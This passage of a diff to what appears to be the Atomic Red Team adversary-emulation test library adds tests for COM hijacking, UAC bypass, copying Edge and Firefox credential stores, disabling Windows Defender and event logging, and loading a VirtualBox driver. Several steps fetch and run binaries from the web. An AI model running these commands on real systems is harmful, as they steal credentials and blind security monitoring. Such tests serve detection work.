+      New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value #{dllpath}
+      New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
+      Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-sta #{clsid}'
+    cleanup_command: |-
+      Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
+    name: powershell

atomics/T1546.015/src/AtomicTest.cpp

@@ -0,0 +1,20 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "pch.h"
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+                     )
+{
+    switch (ul_reason_for_call)
+    {
+    case DLL_PROCESS_ATTACH:
+        MessageBox(0, L"Atomic Test T1546.015", 0, 0);
+    case DLL_THREAD_ATTACH:
+    case DLL_THREAD_DETACH:
+    case DLL_PROCESS_DETACH:
+        break;
+    }
+    return TRUE;
+
+}

atomics/T1548.002/T1548.002.md

@@ -469,7 +469,7 @@ if (Test-Path "$tempPath") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
 Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
 Remove-Item $env:TEMP\uacme.zip -Force
 ```
@@ -539,7 +539,7 @@ if (Test-Path "$tempPath") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
 Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
 Remove-Item $env:TEMP\uacme.zip -Force
 ```
@@ -609,7 +609,7 @@ if (Test-Path "$tempPath") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
 Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
 Remove-Item $env:TEMP\uacme.zip -Force
 ```
@@ -679,7 +679,7 @@ if (Test-Path "$tempPath") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
 Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
 Remove-Item $env:TEMP\uacme.zip -Force
 ```
@@ -749,7 +749,7 @@ if (Test-Path "$tempPath") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
 Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
 Remove-Item $env:TEMP\uacme.zip -Force
 ```
@@ -819,7 +819,7 @@ if (Test-Path "$tempPath") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
 Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
 Remove-Item $env:TEMP\uacme.zip -Force
 ```
@@ -889,7 +889,7 @@ if (Test-Path "$tempPath") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
 Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
 Remove-Item $env:TEMP\uacme.zip -Force
 ```
@@ -959,7 +959,7 @@ if (Test-Path "$tempPath") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
-Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
 Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
 Remove-Item $env:TEMP\uacme.zip -Force
 ```

atomics/T1548.002/T1548.002.yaml

@@ -224,7 +224,7 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
       Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
       Remove-Item $env:TEMP\uacme.zip -Force
   executor:
@@ -270,7 +270,7 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
       Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
       Remove-Item $env:TEMP\uacme.zip -Force
   executor:
@@ -316,7 +316,7 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
       Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
       Remove-Item $env:TEMP\uacme.zip -Force
   executor:
@@ -362,7 +362,7 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
       Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
       Remove-Item $env:TEMP\uacme.zip -Force
   executor:
@@ -408,7 +408,7 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
       Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
       Remove-Item $env:TEMP\uacme.zip -Force
   executor:
@@ -454,7 +454,7 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
       Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
       Remove-Item $env:TEMP\uacme.zip -Force
   executor:
@@ -500,7 +500,7 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
       Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
       Remove-Item $env:TEMP\uacme.zip -Force
   executor:
@@ -546,7 +546,7 @@ atomic_tests:
       $tempPath = cmd /c echo #{uacme_exe}
       if (Test-Path "$tempPath") {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/justaseckev/atomic-red-team/raw/master/atomics/T1548.002/src/UACMe%20binaries.zip" -OutFile "$env:TEMP\uacme.zip"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip" -OutFile "$env:TEMP\uacme.zip"
       Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force
       Remove-Item $env:TEMP\uacme.zip -Force
   executor:

atomics/T1555.003/T1555.003.md

@@ -24,6 +24,8 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
 
 - [Atomic Test #6 - Simulating access to Windows Firefox Login Data](#atomic-test-6---simulating-access-to-windows-firefox-login-data)
 
+- [Atomic Test #7 - Simulating access to Windows Edge Login Data](#atomic-test-7---simulating-access-to-windows-edge-login-data)
+
 
 <br/>
 
@@ -292,12 +294,12 @@ more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-
 
 
 ```powershell
-Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force
+Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force -Recurse
 ```
 
 #### Cleanup Commands:
 ```powershell
-Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig
+Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ignore -Recurse
 ```
 
 
@@ -332,4 +334,61 @@ Stop-Process -Name firefox
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - Simulating access to Windows Edge Login Data
+Simulates an adversary accessing encrypted credentials from Edge web browser's login database.
+more info in https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a6a5ec26-a2d1-4109-9d35-58b867689329
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination $env:temp\Edge -Force -Recurse
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "$env:temp\Edge" -Force -ErrorAction Ignore -Recurse
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Edge must be installed
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+"Installation is not implemented as Edge is a part of windows"
+```
+##### Description: Edge login data file must exist
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+$edge="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
+Start-Process $edge 
+Start-Sleep -s 20
+Stop-Process -Name msedge
+```
+
+
+
+
 <br/>

atomics/T1555.003/T1555.003.yaml

@@ -160,6 +160,34 @@ atomic_tests:
   executor:
     name: powershell
     command: |
-      Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force
+      Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force -Recurse
     cleanup_command: |
-      Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig
+      Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ignore -Recurse
+- name: Simulating access to Windows Edge Login Data
+  auto_generated_guid: a6a5ec26-a2d1-4109-9d35-58b867689329
+  description: |
+    Simulates an adversary accessing encrypted credentials from Edge web browser's login database.
+    more info in https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/
+  supported_platforms:
+    - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Edge must be installed
+    prereq_command: 'if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") {exit 0} else {exit 1}'      
+    get_prereq_command: |
+      "Installation is not implemented as Edge is a part of windows"
+  - description: |
+      Edge login data file must exist
+    prereq_command: 'if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default") {exit 0} else {exit 1}'    
+    get_prereq_command: | 
+      $edge="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
+      Start-Process $edge 
+      Start-Sleep -s 20
+      Stop-Process -Name msedge
+  executor:
+    name: powershell
+    command: |
+      Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination $env:temp\Edge -Force -Recurse
+    cleanup_command: |
+      Remove-Item -Path "$env:temp\Edge" -Force -ErrorAction Ignore -Recurse

atomics/T1560.001/T1560.001.md

@@ -283,7 +283,7 @@ if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; el
 ```
 ##### Get Prereq Commands:
 ```sh
-(which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip)
+(which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip)
 echo Please set input_files argument to include files that exist
 ```
 
@@ -427,7 +427,7 @@ if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```sh
-(which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)
+(which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)
 ```
 
 

atomics/T1560.001/T1560.001.yaml

@@ -175,7 +175,7 @@ atomic_tests:
       prereq_command: |
         if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi;
       get_prereq_command: |
-        (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip)
+        (which yum && yum -y install epel-release zip)||(which apt-get && apt-get install -y zip)
         echo Please set input_files argument to include files that exist
   executor:
     name: sh
@@ -263,7 +263,7 @@ atomic_tests:
       prereq_command: |
         if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi;
       get_prereq_command: |
-        (which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)
+        (which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)
   executor:
     name: sh
     elevation_required: false

atomics/T1562.001/T1562.001.md

@@ -56,6 +56,8 @@
 
 - [Atomic Test #26 - Disable Windows Defender with DISM](#atomic-test-26---disable-windows-defender-with-dism)
 
+- [Atomic Test #27 - Disable Defender with Defender Control](#atomic-test-27---disable-defender-with-defender-control)
+
 
 <br/>
 
@@ -75,7 +77,7 @@ Disables syslog collection
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | package_checker | Package checking command for linux. | String | (rpm -q rsyslog 2>&1 >/dev/null) || (dpkg -s rsyslog | grep -q installed)|
-| package_installer | Package installer command for linux. Default yum | String | (which yum && yum -y epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)|
+| package_installer | Package installer command for linux. Default yum | String | (which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)|
 | flavor_command | Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog | String | systemctl stop rsyslog ; systemctl disable rsyslog|
 | cleanup_command | Command to enable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog start ; chkconfig rsyslog on | String | systemctl start rsyslog ; systemctl enable rsyslog|
 
@@ -1096,4 +1098,55 @@ Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #27 - Disable Defender with Defender Control
+Attempting to use Defender Control software to disable Windows Defender. Upon successful execution, Windows Defender will be turned off.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 178136d8-2778-4d7a-81f3-d517053a4fd6
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| DefenderID | Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window). | String | FFFF|
+| DefenderControlExe | Path to Defender Control software version 1.6. | String | $env:temp&#92;DefenderControl&#92;DefenderControl&#92;DefenderControl.exe|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null
+```
+
+#### Cleanup Commands:
+```powershell
+cmd /c #{DefenderControlExe} /E | Out-Null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Defender Control must be installed on the machine.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic
+expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl"
+```
+
+
+
+
 <br/>

atomics/T1562.001/T1562.001.yaml

@@ -15,7 +15,7 @@ atomic_tests:
     package_installer:
       description: Package installer command for linux. Default yum
       type: String
-      default: (which yum && yum -y epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)
+      default: (which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog)
     flavor_command:
       description: Command to disable syslog collection. Default newer rsyslog commands. i.e older command = service rsyslog stop ; chkconfig off rsyslog
       type: String
@@ -542,4 +542,35 @@ atomic_tests:
     command: |-
       Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
     name: command_prompt
-    elevation_required: true
+    elevation_required: true
+- name: Disable Defender with Defender Control
+  auto_generated_guid: 178136d8-2778-4d7a-81f3-d517053a4fd6
+  description: |
+    Attempting to use Defender Control software to disable Windows Defender. Upon successful execution, Windows Defender will be turned off. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    DefenderID:
+      description: Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window). 
+      type: String
+      default: FFFF
+    DefenderControlExe:
+      description: Path to Defender Control software version 1.6. 
+      type: String
+      default: $env:temp\DefenderControl\DefenderControl\DefenderControl.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Defender Control must be installed on the machine. 
+    prereq_command: |
+      if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic
+      expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl"
+  executor:
+    command: |
+      cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null
+    cleanup_command: |
+      cmd /c #{DefenderControlExe} /E | Out-Null
+    name: powershell
+    elevation_required: true  

atomics/T1562.002/T1562.002.md

@@ -16,6 +16,8 @@ Adversaries may targeting system-wide logging or just that of a particular appli
 
 - [Atomic Test #5 - Disable Event Logging with wevtutil](#atomic-test-5---disable-event-logging-with-wevtutil)
 
+- [Atomic Test #6 - Makes Eventlog blind with Phant0m](#atomic-test-6---makes-eventlog-blind-with-phant0m)
+
 
 <br/>
 
@@ -208,4 +210,54 @@ wevtutil sl "#{log_name}" /e:true
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - Makes Eventlog blind with Phant0m
+Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_name | exe version of Phant0m | Path | PathToAtomicsFolder&#92;T1562.002&#92;bin&#92;Phant0m.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
+```
+
+#### Cleanup Commands:
+```cmd
+echo "Sorry you have to reboot"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Phant0m.exe must exist on disk at specified location (#{file_name})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_name}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
+```
+
+
+
+
 <br/>

atomics/T1562.002/T1562.002.yaml

@@ -97,3 +97,29 @@ atomic_tests:
     cleanup_command: |
       wevtutil sl "#{log_name}" /e:true
     name: command_prompt
+- name: 'Makes Eventlog blind with Phant0m'
+  auto_generated_guid: 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741
+  description: |
+    Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
+  supported_platforms:
+  - windows
+  input_arguments:
+    file_name:
+      description: exe version of Phant0m
+      type: Path
+      default: PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Phant0m.exe must exist on disk at specified location (#{file_name})
+    prereq_command: |
+      if (Test-Path #{file_name}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
+  executor:
+    command: |
+      PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
+    cleanup_command: |
+      echo "Sorry you have to reboot"
+    name: command_prompt

atomics/T1564.006/T1564.006.md

@@ -0,0 +1,89 @@
+# T1564.006 - Run Virtual Instance
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1564/006)
+<blockquote>Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
+
+Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Register Portable Virtualbox](#atomic-test-1---register-portable-virtualbox)
+
+
+<br/>
+
+## Atomic Test #1 - Register Portable Virtualbox
+ransomware payloads via virtual machines (VM). 
+[Maze ransomware](https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c59f246a-34f8-4e4d-9276-c295ef9ba0dd
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_file_path | Path to the MSI file | Path | PathToAtomicsFolder&#92;T1564.006&#92;bin&#92;Virtualbox_52.msi|
+| cab_file_path | Path to the CAB file | Path | PathToAtomicsFolder&#92;T1564.006&#92;bin&#92;common.cab|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+"C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe" /reregserver
+regsvr32 /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
+rundll32 "C:\Program Files\Oracle\VirtualBox\VBoxRT.dll,RTR3Init"
+sc create VBoxDRV binpath= "C:\Program Files\Oracle\VirtualBox\drivers\VboxDrv.sys" type= kernel start= auto error= normal displayname= PortableVBoxDRV
+sc start VBoxDRV
+```
+
+#### Cleanup Commands:
+```cmd
+sc stop VBoxDRV
+sc delete VBoxDRV
+regsvr32 /u /S "C:\Program Files\Oracle\VirtualBox\VboxC.dll"
+msiexec /x #{msi_file_path} /qn
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: MSI file must exist on disk at specified location (#{msi_file_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}"
+```
+##### Description: CAB file must exist on disk at specified location (#{cab_file_path})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{cab_file_path}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/common.cab" -OutFile "#{cab_file_path}"
+```
+##### Description: Old version of Virtualbox must be installed
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "C:\Program Files\Oracle\VirtualBox\VboxC.dll") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+msiexec /i #{msi_file_path} /qn
+```
+
+
+
+
+<br/>

atomics/T1564.006/T1564.006.yaml

@@ -0,0 +1,55 @@
+attack_technique: T1564.006
+display_name: "Run Virtual Instance"
+atomic_tests:
+- name: Register Portable Virtualbox
+  auto_generated_guid: c59f246a-34f8-4e4d-9276-c295ef9ba0dd
+  description: |
+    ransomware payloads via virtual machines (VM). 
+    [Maze ransomware](https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    msi_file_path:
+      description: Path to the MSI file
+      type: Path
+      default: PathToAtomicsFolder\T1564.006\bin\Virtualbox_52.msi
+    cab_file_path:
+      description: Path to the CAB file
+      type: Path
+      default: PathToAtomicsFolder\T1564.006\bin\common.cab
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      MSI file must exist on disk at specified location (#{msi_file_path})
+    prereq_command: |
+      if (Test-Path #{msi_file_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{msi_file_path}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1564.006/bin/Virtualbox_52.msi" -OutFile "#{msi_file_path}"
+  - description: |
+      CAB file must exist on disk at specified location (#{cab_file_path})
+    prereq_command: |
+      if (Test-Path #{cab_file_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{cab_file_path}) -ErrorAction ignore | Out-Null
